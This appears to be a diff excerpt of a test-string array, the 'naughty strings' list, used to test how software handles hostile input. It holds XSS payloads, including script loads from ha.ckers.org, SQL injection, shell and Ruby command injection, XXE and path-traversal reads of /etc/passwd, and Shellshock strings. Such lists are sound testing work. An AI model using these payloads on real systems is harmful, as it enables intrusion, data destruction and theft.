"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x21javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", + "\"`'><script>\\x0Bjavascript:alert(1)</script>", "\"`'><script>\\x20javascript:alert(1)</script>", "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", + "<img \\x00src=x onerror=\"alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x11src=x onerror=\"javascript:alert(1)\">", + "<img \\x12src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", "<img\\x10src=x onerror=\"javascript:alert(1)\">", + "<img\\x13src=x onerror=\"javascript:alert(1)\">", "<img\\x32src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", + "<img\\x11src=x onerror=\"javascript:alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x34src=x onerror=\"javascript:alert(1)\">", + "<img \\x39src=x onerror=\"javascript:alert(1)\">", "<img \\x00src=x onerror=\"javascript:alert(1)\">", "<img src\\x09=x onerror=\"javascript:alert(1)\">", + "<img src\\x10=x onerror=\"javascript:alert(1)\">", "<img src\\x13=x onerror=\"javascript:alert(1)\">", "<img src\\x32=x onerror=\"javascript:alert(1)\">", + "<img src\\x12=x onerror=\"javascript:alert(1)\">", "<img src\\x11=x onerror=\"javascript:alert(1)\">", "<img src\\x00=x onerror=\"javascript:alert(1)\">", + "<img src\\x47=x onerror=\"javascript:alert(1)\">", "<img src=x\\x09onerror=\"javascript:alert(1)\">", "<img src=x\\x10onerror=\"javascript:alert(1)\">", + "<img src=x\\x11onerror=\"javascript:alert(1)\">", "<img src=x\\x12onerror=\"javascript:alert(1)\">", "<img src=x\\x13onerror=\"javascript:alert(1)\">", + "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", "<img src=x onerror=\\x09\"javascript:alert(1)\">", "<img src=x onerror=\\x10\"javascript:alert(1)\">", + "<img src=x onerror=\\x11\"javascript:alert(1)\">", "<img src=x onerror=\\x12\"javascript:alert(1)\">", "<img src=x onerror=\\x32\"javascript:alert(1)\">", + "<img src=x onerror=\\x00\"javascript:alert(1)\">", "<a href=javascript:javascript:alert(1)>XXX</a>", + "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", + "<title onpropertychange=javascript:alert(1)></title><title title=>", + "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", "<!--[if]><script>javascript:alert(1)</script -->", + "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", "<script src=\"/\%(jscript)s\"></script>", "<script src=\"\\%(jscript)s\"></script>", + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=# onmouseover=\"alert('xxs')\">", + "<IMG SRC= onmouseover=\"alert('xxs')\">", "<IMG onmouseover=\"alert('xxs')\">", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG " + "SRC=javascript:alert&#" + "0000040'XSS')>", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG SRC=\"jav ascript:alert('XSS');\">", "<IMG SRC=\"jav	ascript:alert('XSS');\">", "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "<IMG SRC=\"jav
ascript:alert('XSS');\">", "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", + "<IMG SRC=\"  javascript:alert('XSS');\">", "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", + "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "<SCRIPT SRC=//ha.ckers.org/.j>", "<IMG SRC=\"javascript:alert('XSS')\"", + "<iframe src=http://ha.ckers.org/scriptlet.html <", "\\\";alert('XSS');//", "<u oncopy=alert()> Copy me</u>", "<i onwheel=alert(1)> Scroll over me </i>", + "<plaintext>", "http://a/%%30%30", "</textarea><script>alert(123)</script>", + + // SQL Injection + // + // Strings which can cause a SQL injection if inputs are not sanitized + + "1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", "' OR '1'='1", " ", "%", "_", + + // Server Code Injection + // + // Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + + "-", "--", "--version", "--help", "$USER", "/dev/null; touch /tmp/blns.fail ; echo", "`touch /tmp/blns.fail`", "$(touch /tmp/blns.fail)", + "@{[system \"touch /tmp/blns.fail\"]}", + + // Command Injection (Ruby) + // + // Strings which can call system commands within Ruby/Rails applications + + "eval(\"puts 'hello world'\")", "System(\"ls -al /\")", "`ls -al /`", "Kernel.exec(\"ls -al /\")", "Kernel.exit(1)", "%x('ls -al /')", + + // XXE Injection (XML) + // + // String which can reveal system files when parsed by a badly configured XML parser + + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", + + // Unwanted Interpolation + // + // Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or + //shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + + "$HOME", "$ENV{'HOME'}", "%d", "%s", "{0}", "%*.*s", "File:///", + + // File Inclusion + // + // Strings which can cause user to pull in files that should not be a part of a web server + + "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/hosts", + + // Known CVEs and Vulnerabilities + // + // Strings that test for known vulnerabilities + + "() { 0; }; touch /tmp/blns.shellshock1.fail;", "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", "<<< %s(un='%s') = %u", "+++ATH0", + + // MSDOS/Windows Special Filenames + // + // Strings which are reserved characters in MSDOS/Windows + + "CON", "PRN", "AUX", "CLOCK$", "NUL", "A:", "ZZ:", "COM1", "LPT1", "LPT2", "LPT3", "COM2", "COM3", "COM4", + + // IRC specific strings + // + // Strings that may occur on IRC clients that make security products freak out + + "DCC SEND STARTKEYLOGGER 0 0 0", + + // Scunthorpe Problem + // + // Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + + "Scunthorpe General Hospital", "Penistone Community Church", "Lightwater Country Park", "Jimmy Clitheroe", "Horniman Museum", "shitake mushrooms", + "RomansInSussex.co.uk", "http://www.cum.qc.ca/", "Craig Cockburn, Software Specialist", "Linda Callahan", "Dr. Herman I. Libshitz", "magna cum laude", + "Super Bowl XXX", "medieval erection of parapets", "evaluate", "mocha", "expression", "Arsenal canal", "classic", "Tyson Gay", "Dick Van Dyke", "basement", + + // Human injection + // + // Strings which may cause human to reinterpret worldview + + "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your " + "dream, but we hope it works. Please wake up, we miss you.", + + // Terminal escape codes + // + // Strings which punish the fools who use cat/type on this file + + "Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", "But now...[20Cfor my greatest trick...[8m", + "The quick brown fox... [Beeeep]", + + // iOS Vulnerabilities + // + // Strings which crashed iMessage in various versions of iOS + + "Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ " + "¢ᆬᆪ¥ニラ", + "゚マᄈ0゚フネᄌマ"};
\ No newline at end of file |